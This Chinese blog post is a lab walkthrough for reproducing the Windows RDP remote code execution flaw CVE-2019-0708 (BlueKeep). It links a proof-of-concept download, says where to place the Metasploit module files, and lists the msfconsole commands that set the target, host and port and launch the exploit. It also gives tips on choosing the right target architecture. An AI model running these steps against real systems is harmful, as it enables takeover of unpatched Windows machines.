晚安 "你别急,我会慢慢的走出你的世界,不留痕迹"
CVE-2019-0708 RDP远程RCE漏洞复现
发表于 2019-9-7 | | 挖洞骚姿势

前言:CVE-2019-0708介绍

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7

环境:

攻击机:Kali IP:192.168.0.6
靶机: Win7 SP1 x64 IP:192.168.0.14(开放3389端口)
POC:https://github.com/NAXG/cve20190708bluekeeprce失效

POC:https://www.daoblogs.org/CVE-2019-0708/CVE-2019-0708.zip

前期EXP配置:

1.cve20190708bluekeeprce.rb 添加到 /usr/share/metasploit-framework/modules/exploits/windows/rdp/

如果windows目录下没有rdp文件夹,请自行创建。命令:mkdir rdp

2.rdp.rb 替换到 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

3.rdpscanner.rb 替换到 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdpscanner.rb

4.cve20190708bluekeep.rb 替换到 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve20190708bluekeep.rb

打开msf,将模块重载

reload_all

漏洞复现:

使用msfconsole命令启动MSF

请使用使用MSF5 //更新命令:↓

apt update; apt install metasploit-framework


search 0708 //搜索我们的exp

使用 use exploit/windows/rdp/cve20190708bluekeeprce进入模块
接着使用命令info查看配置
我使用红框标出来的地方时关键区域。

RHOST\RPOST\TARGET
先使用set taget ID数字设置机器的架构 //我的靶子是VMWare架构的所以我选择3
接着set RHOST 192.168.0.14 //设置目标机IP
最后set RPORT 3389 //设置目标机RDP端口

设置完成后我们就完成了,接着使用exploit开始攻击。

当出现这个的时候就是成功了。

注意事项:

1,这个EXP只可以去打WIN7 SP1 和 WIN 2008 R2
2,目标机一定要开启允许任何人远程桌面连接
3,文章里面的文件一定要放好位置,路径按照你的MSF地址来安装。 4,MSF要升级为MSF5
5,网络层:比如:你的win7在公网上面,而你的msf在内网,怎么去攻击啊?
6,target是主机架构选择的意思,一定要选对。

前面的数字就是序号。选错架构会导致蓝屏,利用失败等问题。(本人就选错了架构,眼睛瞎了一下。蓝屏了6次,失败两次。最后准备不搞了的时候,才发觉到target设置错了o(╥﹏╥)o)

结言:

本文章首发于SKY·SEC 道的Blog。
转发请带上本博客的版权。谢谢
SKY·SEC官方网站:www.hi-awsafe.com
道的Blog官方网站:www.daoblogs.org

发表评论:

TOP